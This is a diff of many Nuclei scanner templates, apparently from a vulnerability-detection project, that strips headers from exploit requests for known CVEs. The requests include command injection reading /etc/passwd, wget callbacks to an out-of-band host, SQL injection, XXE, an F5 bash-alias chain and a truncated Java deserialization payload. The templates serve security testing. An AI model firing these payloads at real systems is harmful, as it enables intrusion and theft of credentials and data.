Upgrade-Insecure-Requests: 1
|
||||
|
||||
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
Referer: http://{{Hostname}}/login_pic.asp
|
||||
Referer: {{BaseURL}}/login_pic.asp
|
||||
Cookie: uid=1234123
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
|
@ -55,6 +41,7 @@ requests:
|
|||
- "root:.*:0:0:"
|
||||
- "\\[(font|extension|file)s\\]"
|
||||
condition: or
|
||||
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -13,7 +13,6 @@ requests:
|
|||
- |
|
||||
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
payloads:
|
||||
|
|
|
@ -11,14 +11,11 @@ requests:
|
|||
- |
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{core}}/config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
Content-Length: 259
|
||||
|
||||
{
|
||||
"update-queryresponsewriter": {
|
||||
|
|
|
@ -16,7 +16,6 @@ requests:
|
|||
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Content-Length: 76
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
|
||||
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{{interactsh-url}}">
|
||||
|
|
|
@ -12,12 +12,7 @@ requests:
|
|||
- |
|
||||
POST /rest/tinymce/1/macro/preview HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Referer: {{Hostname}}
|
||||
Content-Length: 168
|
||||
Connection: close
|
||||
|
||||
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
|
||||
|
||||
|
@ -26,6 +21,7 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<param-name>contextConfigLocation</param-name>"
|
||||
|
|
|
@ -12,11 +12,7 @@ requests:
|
|||
- |
|
||||
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
|
||||
Content-Length: 124
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
|
||||
|
||||
|
|
|
@ -11,31 +11,21 @@ info:
|
|||
tags: cve,cve2019,emerge,rce
|
||||
|
||||
requests:
|
||||
- raw: # Default Port
|
||||
- raw:
|
||||
- |
|
||||
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
- |
|
||||
GET /nuclei.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
|
|
@ -10,31 +10,27 @@ info:
|
|||
- https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
|
||||
tags: cve,cve2019,kibana,rce
|
||||
|
||||
# Kibana versions before 5.6.15 and 6.6.1
|
||||
# contain an arbitrary code execution flaw in the Timelion visualizer.
|
||||
# An attacker with access to the Timelion application could send a request
|
||||
# that will attempt to execute javascript code.
|
||||
# This could possibly lead to an attacker executing arbitrary commands
|
||||
# with permissions of the Kibana process on the host system.
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/timelion/run"
|
||||
headers:
|
||||
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
|
||||
Content-Type: "application/json; charset=utf-8"
|
||||
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
|
||||
|
||||
body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "seriesList"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -12,7 +12,6 @@ requests:
|
|||
- |
|
||||
POST /Autodiscover/Autodiscover.xml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Content-Type: application/xml
|
||||
|
||||
<!DOCTYPE xxe [
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
id: CVE-2019-9733
|
||||
|
||||
info:
|
||||
name: Artifactory Access-Admin Login Bypass
|
||||
author: akshansh
|
||||
|
@ -15,18 +16,13 @@ requests:
|
|||
- |
|
||||
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 60
|
||||
Accept: application/json, text/plain, */*
|
||||
X-Requested-With: artUI
|
||||
serial: 58
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
Request-Agent: artifactoryUI
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
|
||||
Content-Type: application/json
|
||||
Origin: http://{{Hostname}}
|
||||
Referer: http://{{Hostname}}/artifactory/webapp/
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}/artifactory/webapp/
|
||||
|
||||
{"user":"access-admin","password":"password","type":"login"}
|
||||
|
||||
|
|
|
@ -15,24 +15,17 @@ requests:
|
|||
- |
|
||||
GET /api/experimental/test HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
|
||||
- |
|
||||
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
|
||||
- |
|
||||
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Content-Length: 85
|
||||
Content-Type: application/json
|
||||
|
||||
{"conf": {"message": "\"; touch test #"}}
|
||||
|
@ -40,8 +33,6 @@ requests:
|
|||
- |
|
||||
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
|
||||
|
||||
|
|
|
@ -14,9 +14,6 @@ requests:
|
|||
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 218
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
|
||||
|
|
|
@ -10,33 +10,22 @@ info:
|
|||
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
|
||||
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
|
||||
|
||||
# This template exploits a Python code injection in the Netsweeper
|
||||
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
|
||||
# prior, to execute code as the root user.
|
||||
|
||||
# Authentication is bypassed by sending a random whitelisted Referer
|
||||
# header in each request.
|
||||
|
||||
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
|
||||
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
|
||||
# been confirmed exploitable.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
|
||||
# Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
|
||||
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
|
||||
- "{{BaseURL}}/webadmin/out"
|
||||
headers:
|
||||
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
|
||||
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
|
||||
Connection: "close"
|
||||
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "nonexistent"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -13,13 +13,11 @@ requests:
|
|||
- |
|
||||
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- |
|
||||
GET /include/nuclei.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
|
|
|
@ -14,7 +14,6 @@ requests:
|
|||
- |
|
||||
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -13,16 +13,12 @@ requests:
|
|||
- |
|
||||
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
|
@ -33,6 +29,7 @@ requests:
|
|||
- "Position: ||whoami||"
|
||||
- "root"
|
||||
condition: and
|
||||
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -16,9 +16,7 @@ requests:
|
|||
POST /jars/upload HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
|
||||
Content-Length: 187
|
||||
|
||||
------WebKitFormBoundaryoZ8meKnrrso89R6Y
|
||||
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
|
||||
|
|
|
@ -14,25 +14,14 @@ requests:
|
|||
GET /?p=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 745
|
||||
Accept: */*
|
||||
X-Requested-With: XMLHttpRequest
|
||||
sec-ch-ua-mobile: ?0
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||
Origin: {{BaseURL}}
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Referer: {{BaseURL}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
|
|
@ -13,34 +13,21 @@ requests:
|
|||
- | # Response:Location: /page/login/login_fail.html
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: id,en-US;q=0.7,en;q=0.3
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: uid=6gPjT2ipmNz
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 0
|
||||
|
||||
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
|
||||
|
||||
- | # Get /etc/passwd
|
||||
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: id,en-US;q=0.7,en;q=0.3
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: uid=6gPjT2ipmNz
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 0
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "nobody:[x*]:65534:65534"
|
||||
|
|
|
@ -19,9 +19,7 @@ requests:
|
|||
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Length: 608
|
||||
Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
|
||||
Connection: close
|
||||
|
||||
--------------------------ca81ac1fececda48
|
||||
Content-Disposition: form-data; name="reqid"
|
||||
|
|
|
@ -15,18 +15,14 @@ requests:
|
|||
- |
|
||||
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
|
||||
|
||||
- |
|
||||
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -15,9 +15,7 @@ requests:
|
|||
- |
|
||||
POST /login.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
|
||||
|
||||
|
|
|
@ -16,17 +16,10 @@ requests:
|
|||
- |
|
||||
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
|
||||
- |
|
||||
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -14,10 +14,7 @@ requests:
|
|||
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/json
|
||||
User-Agent: Ophion SecurityGroup
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}
|
||||
|
||||
|
|
|
@ -13,12 +13,9 @@ requests:
|
|||
- |
|
||||
POST /goform/setSysAdm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
Origin: http://{{Hostname}}
|
||||
Referer: http://{{Hostname}}/login.shtml
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}/login.shtml
|
||||
|
||||
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
|
||||
|
||||
|
|
|
@ -17,7 +17,6 @@ requests:
|
|||
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 44
|
||||
|
||||
SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E
|
||||
|
||||
|
|
|
@ -14,30 +14,16 @@ requests:
|
|||
- |
|
||||
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 269
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||
Accept: */*
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
|
||||
------WebKitFormBoundaryBJ17hSJBjuGrnW92
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
@ -52,11 +38,6 @@ requests:
|
|||
- |
|
||||
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
|
||||
Connection: close
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
|
|
@ -15,14 +15,6 @@ requests:
|
|||
- |
|
||||
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -15,8 +15,6 @@ requests:
|
|||
POST /dfsms/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
Content-Length: 66
|
||||
|
||||
username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
|
||||
|
||||
|
|
|
@ -26,11 +26,13 @@ requests:
|
|||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
|
||||
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
|
||||
- "{{BaseURL}}/hsqldb%0a"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
@ -38,41 +40,35 @@ requests:
|
|||
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
|
||||
- "HSQL Database Engine Servlet"
|
||||
condition: or
|
||||
part: body
|
||||
|
||||
- raw:
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=create%20cli%20alias%20private%20list%20command%20bash
|
||||
- |
|
||||
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=list%20%2Ftmp%2Fnonexistent
|
||||
- |
|
||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
|
||||
command=delete%20cli%20alias%20private%20list
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "h3ll0_w0Rld"
|
||||
|
|
|
@ -14,9 +14,6 @@ requests:
|
|||
- |
|
||||
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -15,14 +15,8 @@ requests:
|
|||
- |
|
||||
POST /api/jsonws/invoke HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
Content-Length: 4938
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
|
||||
X-Requested-With: XMLHttpRequest
|
||||
cmd2: §command§
|
||||
|
||||
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6